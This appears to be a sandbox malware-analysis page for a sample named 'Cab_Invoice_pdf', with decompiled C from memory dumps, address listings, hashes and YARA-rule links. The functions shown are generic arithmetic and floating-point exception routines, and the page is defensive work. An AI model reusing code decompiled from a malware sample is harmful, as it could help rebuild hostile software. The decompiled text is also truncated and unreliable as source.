							return _t67;
						} else {
							goto L6;
						}
					}
				} else {
					_t82 = 0xc;
					L8:
					return _t82;
				}
				L40:
			}




























































                            0x01327163
                            0x01327164
                            0x0132716b
                            0x0132716b
                            0x0132716e
                            0x0132716e
                            0x01327171
                            0x01327174
                            0x01327179
                            0x01327183
                            0x01327186
                            0x0132718b
                            0x01327193
                            0x01327196
                            0x013271a0
                            0x013271a3
                            0x013271a4
                            0x013271a6
                            0x013271ba
                            0x013271ba
                            0x013271bd
                            0x013271c7
                            0x013271cc
                            0x013271cf
                            0x013271d1
                            0x00000000
                            0x013271d3
                            0x013271d7
                            0x013271e0
                            0x013271e6
                            0x00000000
                            0x013271e8
                            0x013271a8
                            0x013271a8
                            0x013271ae
                            0x013271b3
                            0x013271b6
                            0x013271b8
                            0x013271ef
                            0x013271f1
                            0x013271f2
                            0x013271f3
                            0x013271f4
                            0x013271f5
                            0x013271f6
                            0x013271fb
                            0x013271ff
                            0x01327201
                            0x01327207
                            0x0132720e
                            0x01327211
                            0x01327214
                            0x01327217
                            0x01327218
                            0x0132721b
                            0x0132721c
                            0x0132721f
                            0x01327222
                            0x01327228
                            0x01327232
                            0x0132724e
                            0x0132724e
                            0x01327250
                            0x00000000
                            0x00000000
                            0x01327235
                            0x01327238
                            0x0132723f
                            0x01327241
                            0x01327244
                            0x01327246
                            0x01327249
                            0x0132724b
                            0x0132724b
                            0x00000000
                            0x0132724b
                            0x01327249
                            0x01327244
                            0x00000000
                            0x0132723f
                            0x01327252
                            0x01327255
                            0x01327258
                            0x01327274
                            0x01327276
                            0x01327278
                            0x0132727a
                            0x0132727b
                            0x0132727e
                            0x01327294
                            0x01327296
                            0x01327296
                            0x01327280
                            0x01327282
                            0x01327283
                            0x01327286
                            0x00000000
                            0x01327288
                            0x0132728a
                            0x0132728b
                            0x0132728e
                            0x00000000
                            0x01327290
                            0x01327290
                            0x01327290
                            0x0132728e
                            0x01327286
                            0x0132729e
                            0x013272a6
                            0x013272aa
                            0x013272b8
                            0x013272bd
                            0x013272d2
                            0x013272d4
                            0x013272d7
                            0x0132730c
                            0x01327317
                            0x01327317
                            0x0132731c
                            0x01327322
                            0x01327323
                            0x01327323
                            0x0132732a
                            0x01327347
                            0x01327347
                            0x01327356
                            0x0132735b
                            0x0132735e
                            0x01327360
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132732c
                            0x0132732c
                            0x01327333
                            0x00000000
                            0x01327335
                            0x01327335
                            0x0132733c
                            0x00000000
                            0x0132733e
                            0x0132733e
                            0x01327345
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01327345
                            0x0132733c
                            0x01327333
                            0x00000000
                            0x01327362
                            0x0132736a
                            0x01327370
                            0x01327376
                            0x0132737a
                            0x0132737a
                            0x0132737d
                            0x0132737f
                            0x01327385
                            0x0132738c
                            0x0132738f
                            0x01327391
                            0x013273a5
                            0x013273aa
                            0x013272d9
                            0x013272df
                            0x013272e3
                            0x013272eb
                            0x013272eb
                            0x013272eb
                            0x013272ed
                            0x013272f0
                            0x013272f3
                            0x013272f3
                            0x013272f9
                            0x0132725a
                            0x0132725d
                            0x0132725f
                            0x00000000
                            0x01327261
                            0x01327261
                            0x01327267
                            0x0132726c
                            0x0132725f
                            0x01327300
                            0x01327303
                            0x0132730b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013271b8
                            0x0132718d
                            0x0132718f
                            0x013271e9
                            0x013271ee
                            0x013271ee
                            0x00000000

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID: /
                            • API String ID: 0-2043925204
                            • Opcode ID: 0ad44a2370c7647974f3fb11fdf8560f88c7b97a4c2d8332a685ebc93ea62d29
                            • Instruction ID: 6e79c7d5cca0e6d2844d558d55c50ccf9a167e4ef4d748e114f6fa4219d51d26
                            • Opcode Fuzzy Hash: 0ad44a2370c7647974f3fb11fdf8560f88c7b97a4c2d8332a685ebc93ea62d29
                            • Instruction Fuzzy Hash: 6B412872900229ABCB24AFBDCC88DAB77BDFB85718F204268F905D7180E630DD458B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013292A0, Relevance: 3.5, APIs: 2, Instructions: 464COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 90%
                            			E013292A0(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E0132F280(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E0132F010(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E0132F110(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E0132F110(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0x132a8bd
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E0132F010( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E01319BDB(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E01319BDB(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E01319BDB(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}























































































                            0x013292ac
                            0x013292af
                            0x013292b3
                            0x013292bd
                            0x013292c0
                            0x013292c2
                            0x013292c4
                            0x013292d1
                            0x013292d1
                            0x013292d4
                            0x013292d4
                            0x013292d7
                            0x013292da
                            0x013292dc
                            0x0132940f
                            0x01329411
                            0x0132945a
                            0x0132945e
                            0x01329464
                            0x01329413
                            0x01329415
                            0x01329418
                            0x0132941a
                            0x0132941d
                            0x0132941f
                            0x01329421
                            0x01329455
                            0x01329455
                            0x01329455
                            0x01329423
                            0x01329428
                            0x0132942e
                            0x0132942e
                            0x01329431
                            0x01329433
                            0x01329435
                            0x00000000
                            0x00000000
                            0x01329437
                            0x01329438
                            0x0132943b
                            0x0132943e
                            0x01329440
                            0x00000000
                            0x01329442
                            0x00000000
                            0x01329442
                            0x00000000
                            0x01329440
                            0x01329444
                            0x0132944b
                            0x0132944f
                            0x01329453
                            0x00000000
                            0x00000000
                            0x01329453
                            0x01329456
                            0x01329456
                            0x01329458
                            0x01329465
                            0x01329468
                            0x0132946b
                            0x0132946e
                            0x0132946e
                            0x01329472
                            0x01329475
                            0x01329478
                            0x0132947b
                            0x01329486
                            0x0132947d
                            0x01329482
                            0x01329482
                            0x01329490
                            0x01329495
                            0x01329498
                            0x0132949a
                            0x013294a4
                            0x013294a7
                            0x013294ae
                            0x013294b1
                            0x013294b4
                            0x013294bc
                            0x013294c2
                            0x013294c2
                            0x013294c2
                            0x013294c2
                            0x013294b4
                            0x013294c7
                            0x013294ce
                            0x013294ce
                            0x013294d1
                            0x013294d4
                            0x01329706
                            0x01329706
                            0x013294da
                            0x013294da
                            0x013294e0
                            0x013294e3
                            0x013294e6
                            0x013294e9
                            0x013294ec
                            0x013294ef
                            0x013294f2
                            0x013294f2
                            0x013294f5
                            0x013294fc
                            0x013294fc
                            0x013294f7
                            0x013294f7
                            0x013294f7
                            0x013294fe
                            0x01329502
                            0x01329505
                            0x01329507
                            0x0132950a
                            0x01329511
                            0x01329514
                            0x01329517
                            0x01329522
                            0x01329525
                            0x0132952a
                            0x0132952f
                            0x01329536
                            0x0132953b
                            0x0132953d
                            0x0132953f
                            0x01329543
                            0x01329546
                            0x01329549
                            0x01329551
                            0x0132955a
                            0x0132955a
                            0x0132955c
                            0x0132955f
                            0x0132955f
                            0x01329549
                            0x01329569
                            0x0132956e
                            0x01329573
                            0x01329575
                            0x01329578
                            0x0132957a
                            0x0132957d
                            0x01329580
                            0x01329582
                            0x01329585
                            0x01329588
                            0x0132958a
                            0x01329591
                            0x01329596
                            0x01329599
                            0x013295a3
                            0x013295a5
                            0x013295a7
                            0x013295aa
                            0x013295aa
                            0x013295ac
                            0x013295af
                            0x013295b2
                            0x013295b5
                            0x013295b8
                            0x0132958c
                            0x0132958c
                            0x0132958f
                            0x00000000
                            0x00000000
                            0x0132958f
                            0x013295bb
                            0x013295bd
                            0x013295bf
                            0x00000000
                            0x013295c1
                            0x013295c1
                            0x013295c4
                            0x013295c6
                            0x013295c6
                            0x013295d4
                            0x013295d7
                            0x013295dc
                            0x013295de
                            0x00000000
                            0x00000000
                            0x013295e0
                            0x013295e7
                            0x013295e7
                            0x013295ea
                            0x013295ed
                            0x013295f0
                            0x013295f3
                            0x013295f3
                            0x013295f6
                            0x013295f9
                            0x013295fd
                            0x01329600
                            0x01329602
                            0x01329605
                            0x00000000
                            0x00000000
                            0x01329607
                            0x01329605
                            0x013295e2
                            0x013295e2
                            0x013295e5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013295e5
                            0x0132960c
                            0x0132960c
                            0x00000000
                            0x0132960c
                            0x01329609
                            0x00000000
                            0x01329609
                            0x013295c4
                            0x013295bf
                            0x0132960f
                            0x0132960f
                            0x01329611
                            0x0132961b
                            0x0132961b
                            0x0132961e
                            0x01329620
                            0x01329622
                            0x01329624
                            0x01329629
                            0x0132962c
                            0x0132962c
                            0x0132962f
                            0x01329632
                            0x01329635
                            0x01329637
                            0x0132964c
                            0x0132964e
                            0x01329650
                            0x01329652
                            0x01329654
                            0x01329656
                            0x01329658
                            0x0132965a
                            0x0132965d
                            0x0132965d
                            0x01329661
                            0x01329663
                            0x01329669
                            0x0132966c
                            0x0132966c
                            0x0132966c
                            0x01329670
                            0x01329670
                            0x01329675
                            0x01329678
                            0x01329678
                            0x0132967d
                            0x0132967f
                            0x01329681
                            0x01329688
                            0x01329688
                            0x0132968a
                            0x0132968f
                            0x01329691
                            0x01329694
                            0x01329694
                            0x01329697
                            0x013296a0
                            0x013296a0
                            0x013296a2
                            0x013296a2
                            0x013296a7
                            0x013296ad
                            0x013296b1
                            0x013296b4
                            0x013296b7
                            0x013296b9
                            0x013296b9
                            0x013296b9
                            0x013296be
                            0x013296be
                            0x013296c1
                            0x013296c4
                            0x01329683
                            0x01329683
                            0x01329686
                            0x00000000
                            0x00000000
                            0x01329686
                            0x01329681
                            0x013296cb
                            0x013296cb
                            0x013296cc
                            0x01329613
                            0x01329613
                            0x01329615
                            0x00000000
                            0x00000000
                            0x01329615
                            0x013296dc
                            0x013296e1
                            0x013296e4
                            0x013296e8
                            0x013296e9
                            0x013296ec
                            0x013296ef
                            0x013296f0
                            0x013296f3
                            0x013296f6
                            0x013296f9
                            0x013296fc
                            0x013296fc
                            0x01329704
                            0x0132970b
                            0x0132970c
                            0x0132970e
                            0x01329710
                            0x01329712
                            0x01329715
                            0x01329720
                            0x01329720
                            0x01329726
                            0x01329726
                            0x01329729
                            0x0132972a
                            0x0132972a
                            0x01329720
                            0x0132972e
                            0x01329730
                            0x01329732
                            0x01329734
                            0x01329734
                            0x01329736
                            0x0132973a
                            0x00000000
                            0x00000000
                            0x0132973c
                            0x0132973c
                            0x0132973f
                            0x01329741
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01329741
                            0x01329734
                            0x01329743
                            0x0132974d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01329458
                            0x013292e2
                            0x013292e2
                            0x013292e2
                            0x013292e5
                            0x013292e8
                            0x013292eb
                            0x0132931c
                            0x0132931e
                            0x01329369
                            0x0132936b
                            0x01329372
                            0x01329379
                            0x0132937c
                            0x0132937f
                            0x01329385
                            0x01329385
                            0x01329386
                            0x01329389
                            0x01329390
                            0x01329399
                            0x0132939e
                            0x013293a1
                            0x013293a6
                            0x013293a9
                            0x013293ab
                            0x013293b0
                            0x013293b3
                            0x013293b6
                            0x013293b6
                            0x013293b6
                            0x013293ba
                            0x013293bd
                            0x013293bd
                            0x013293c2
                            0x013293c2
                            0x013293cd
                            0x013293d8
                            0x013293d8
                            0x013293db
                            0x013293e7
                            0x013293ec
                            0x013293f7
                            0x013293f9
                            0x013293fb
                            0x01329401
                            0x01329406
                            0x01329408
                            0x0132940e
                            0x01329320
                            0x0132932c
                            0x0132932c
                            0x0132932f
                            0x0132933f
                            0x01329345
                            0x0132934c
                            0x0132934e
                            0x01329356
                            0x01329358
                            0x0132935a
                            0x0132935f
                            0x01329362
                            0x01329368
                            0x01329368
                            0x013292ed
                            0x013292f0
                            0x013292f4
                            0x013292fa
                            0x01329309
                            0x01329313
                            0x0132931b
                            0x0132931b
                            0x013292eb
                            0x013292c6
                            0x013292c9
                            0x013292cf
                            0x013292cf
                            0x013292b5
                            0x013292bb
                            0x013292bb

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cc7eed304090a535ba91088c2406c7840382efe5eeae5ed94ff06270029249c3
                            • Instruction ID: 46328f26840b3d648e6c74240f6a9c4805aeea19f338496172a008894157a59a
                            • Opcode Fuzzy Hash: cc7eed304090a535ba91088c2406c7840382efe5eeae5ed94ff06270029249c3
                            • Instruction Fuzzy Hash: 9C021B71E002299BDF14DFADC8807ADBBF5FF48328F258169D919E7285D731AA41CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132E8DF, Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODECrypto
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0132E8DF(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E0132CA1B(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
